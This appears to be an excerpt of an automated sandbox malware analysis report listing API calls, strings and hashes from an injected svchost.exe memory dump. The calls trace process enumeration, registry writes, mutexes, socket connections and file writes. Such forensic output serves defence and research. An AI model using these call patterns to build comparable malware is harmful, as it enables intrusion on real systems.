                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2971961948-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02C95B68
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02C95B99
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02C95BC5
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02C95BEC
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(000003DC,000003E8), ref: 02C95C1D
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(000003DC), ref: 02C95C3E
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 02C95C48
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2971961948-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02C9BB8F
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02C9BBBB
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02C9BBE2
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 02C9BC11
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,5dd2ba1da), ref: 02C9BC27
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$InformationObjectUserlstrcmpi
                                                                                                                                                                                                              • String ID: 5dd2ba1da
                                                                                                                                                                                                              • API String ID: 410342393-2661299619
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004015C4
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004015CF
                                                                                                                                                                                                              • Process32First.KERNEL32 ref: 004015F5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,?), ref: 00401610
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,?), ref: 0040161C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401638
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040164A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3955875343-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB4C14
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02CB4C1F
                                                                                                                                                                                                              • Process32First.KERNEL32 ref: 02CB4C45
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,?), ref: 02CB4C60
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,?), ref: 02CB4C6C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CB4C88
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB4C9A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3955875343-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,-80000001,?,?,?,?,?,?,0000001C,00000000), ref: 02CA18AD
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(-80000001,5DD2BFFFa,00000000,00000001,?,00000104,?,?,?,?,0000001C,00000000), ref: 02CA18CF
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(-80000001,?,?,?,?,0000001C,00000000), ref: 02CA18DD
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(-80000001,?,?,?,?,0000001C,00000000), ref: 02CA18F0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseFlushOpenValue
                                                                                                                                                                                                              • String ID: 5DD2BFFFa$software\microsoft
                                                                                                                                                                                                              • API String ID: 2510291871-1795079277
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 02CC1314
                                                                                                                                                                                                              • inet_addr.WS2_32(?), ref: 02CC131F
                                                                                                                                                                                                              • htonl.WS2_32(000000FF), ref: 02CC132A
                                                                                                                                                                                                              • gethostbyname.WS2_32(?), ref: 02CC1336
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 02CC1350
                                                                                                                                                                                                              • connect.WS2_32(00000000,?,00000010), ref: 02CC1363
                                                                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 02CC136E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: closesocketconnectgethostbynamehtonlhtonsinet_addrsocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 298246419-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02C9D860,00000000,00000000,00000000), ref: 02C9D8A4
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,02C99D7A,?,?,?,?,02C99F49,00000000,?,?,?,?,02C99400), ref: 02C9D8BC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,02C99D7A,?,?,?,?,02C99F49,00000000,?,?,?,?,02C99400,?), ref: 02C9D8CD
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,02C99D7A,?,?,?,?,02C99F49,00000000,?,?,?,?,02C99400), ref: 02C9D8DC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02C9D910
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 02C9D917
                                                                                                                                                                                                              • PostMessageA.USER32(?,00000215,00000000,00000000), ref: 02C9D92B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseCreateInformationMessageMutexObjectPostReleaseSingleThreadWaitWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 731183410-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\tasks\, xrefs: 004034C9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
                                                                                                                                                                                                              • String ID: \\?\globalroot\systemroot\system32\tasks\
                                                                                                                                                                                                              • API String ID: 4133869067-1576788796
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • shutdown.WS2_32(?,00000001), ref: 02CA990B
                                                                                                                                                                                                              • shutdown.WS2_32(02CA99EC,00000001), ref: 02CA9910
                                                                                                                                                                                                              • recv.WS2_32(02CA99EC,?,00000400,00000000), ref: 02CA992F
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000400,00000000), ref: 02CA9945
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 02CA9959
                                                                                                                                                                                                              • closesocket.WS2_32(02CA99EC), ref: 02CA995C
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 02CA9960
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: closesocketrecvshutdown$ExitThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1638183600-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000102,?,?,?,02C93B25,?), ref: 02C938C0
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(00000000,5dd2bf87a,00000000,00000004,?,00000004,?,?,02C93B25,?), ref: 02C938DC
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(00000000,?,?,02C93B25,?), ref: 02C938EA
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,02C93B25,?), ref: 02C938F8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseFlushOpenValue
                                                                                                                                                                                                              • String ID: 5dd2bf87a$software\microsoft
                                                                                                                                                                                                              • API String ID: 2510291871-846386698
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02CB193E
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02CB59EE
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02C95DE8,?,?,02C95DE8,?,00000001), ref: 02CB5A0B
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: SetNamedSecurityInfoA.ADVAPI32(?,02C95DE8,00000010,00000000,00000000,00000000,00000001), ref: 02CB5A26
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: LocalFree.KERNEL32(?,?,?,02C95DE8,?,00000001), ref: 02CB5A37
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732},00000006), ref: 02CB195B
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CB1962
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CB1974
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB1985
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$Descriptor$HandleMutex$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                              • String ID: Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
                                                                                                                                                                                                              • API String ID: 1370207991-2011349651
                                                                                                                                                                                                              • Opcode ID: e5b9de26df3e8d6b63ff616afb433464a903035fd8d153d40fa9b72db8e09c5b
                                                                                                                                                                                                              • Instruction ID: 4f732c3713136276407563d4ced4ec09ae15b998e7d0353052f2f0fcc99f3ab9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5b9de26df3e8d6b63ff616afb433464a903035fd8d153d40fa9b72db8e09c5b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41F0E930D93214F7E31157A59C09F9F7BAC9F08B86F440655F909E5180D7E04711C6E1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}), ref: 02CAB98E
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02CB59EE
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02C95DE8,?,?,02C95DE8,?,00000001), ref: 02CB5A0B
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: SetNamedSecurityInfoA.ADVAPI32(?,02C95DE8,00000010,00000000,00000000,00000000,00000001), ref: 02CB5A26
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: LocalFree.KERNEL32(?,?,?,02C95DE8,?,00000001), ref: 02CB5A37
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014},00000006), ref: 02CAB9AB
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CAB9B2
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CAB9C4
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CAB9D5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$Descriptor$HandleMutex$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                              • String ID: Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
                                                                                                                                                                                                              • API String ID: 1370207991-2598904463
                                                                                                                                                                                                              • Opcode ID: b6ec345f8fe5e89c050eeed817a036dda887942aa6945813898877b4c1dc1ab0
                                                                                                                                                                                                              • Instruction ID: fe502d258010cf381e25fc175d84fd1acd8088f529eedca821ab205f487659fb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6ec345f8fe5e89c050eeed817a036dda887942aa6945813898877b4c1dc1ab0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7F0A730DC3219B7F7216BA69D0DF9E7B6CAF05B9AF400642F905E61C0DBB15A14C6E1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02CB96E6
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CB96ED
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CB96FA
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CB9701
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02CB9710
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CB9713
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CB9720
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CB9723
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1670920773-0
                                                                                                                                                                                                              • Opcode ID: c91faf8699e5d3f9ede83349c00d206886a81c648f6c50941e2ba5d4428cc462
                                                                                                                                                                                                              • Instruction ID: 201c5c7692fbb55e12d6d6c27d5ca4f7670b698f2e391d24a91f4a64da00e425
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c91faf8699e5d3f9ede83349c00d206886a81c648f6c50941e2ba5d4428cc462
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3831B371A01304ABDB219F69C848BDBBBB8EF85314F048949ED19EB241D731EA50CBE0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 1186645d0c75b85de98526e47af18d9fe8354d88ea576be7dafbbf4eb3d33ec1
                                                                                                                                                                                                              • Instruction ID: fa75da3ec91bba85beb4d574018028363460bf0af4c94ec218f2ab84a0d8b381
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1186645d0c75b85de98526e47af18d9fe8354d88ea576be7dafbbf4eb3d33ec1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A017571A86204ABDF21ABE5EC88F977B5CEF84765F404A23FA05DB140C7369510CAF0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • free.MSVCRT(00000000,?,00000004,?,00000000,00000000), ref: 02CBE56F
                                                                                                                                                                                                              • MoveFileA.KERNEL32(?,?), ref: 02CBE75D
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 02CBE7A1
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CBE813
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$AttributesCreateDirectoryMovefree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1026147201-0
                                                                                                                                                                                                              • Opcode ID: 59ee3eec59f6cbda8afbb8a0d0670c1443450acd5bdca51b0c88ed713fd5672e
                                                                                                                                                                                                              • Instruction ID: 7fd2ff860c7a4afc99a99f716b8c371a5ad481e2937e9f05cb43565a3091dd1f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 59ee3eec59f6cbda8afbb8a0d0670c1443450acd5bdca51b0c88ed713fd5672e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE4168309043598FCF228F788C84BEA7FA49F96740F9049A9E682D7241DB318649CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,00000000), ref: 02CB8AF4
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,02CB9447), ref: 02CB8B0E
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02CB8B36
                                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(?,?,?,?,?,02CB9447), ref: 02CB8B42
                                                                                                                                                                                                                • Part of subcall function 02C97310: GetHandleInformation.KERNEL32(?,00000000), ref: 02C97324
                                                                                                                                                                                                                • Part of subcall function 02C97310: CloseHandle.KERNEL32(?), ref: 02C97335
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02CB8B6E
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00140B17,02CB9447,00000000,00140B17), ref: 02CB8BA0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleViewmemcpy$CloseCreateInformationMappingUnmapWrite
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3741995677-0
                                                                                                                                                                                                              • Opcode ID: e30b2d0bb218e8d29757cf7c33b6371234d3031152b5ea954b8dd5b304def9e9
                                                                                                                                                                                                              • Instruction ID: 8c2aeb4996da59196f1645089a9e2f7f85f27fa99982855ff531fe8fe2c9ca5b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e30b2d0bb218e8d29757cf7c33b6371234d3031152b5ea954b8dd5b304def9e9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4318DB1A41209BBD710DF99DC84BAAF7ACFF58714F10825AEA0497740D770AE64CBE0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GdiFlush.GDI32(00000000,?,00000000), ref: 02C988B6
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C988C4
                                                                                                                                                                                                              • IsBadWritePtr.KERNEL32(?,?), ref: 02C988DA
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(00000000,?), ref: 02C988E6
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02C988F3
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02C98915
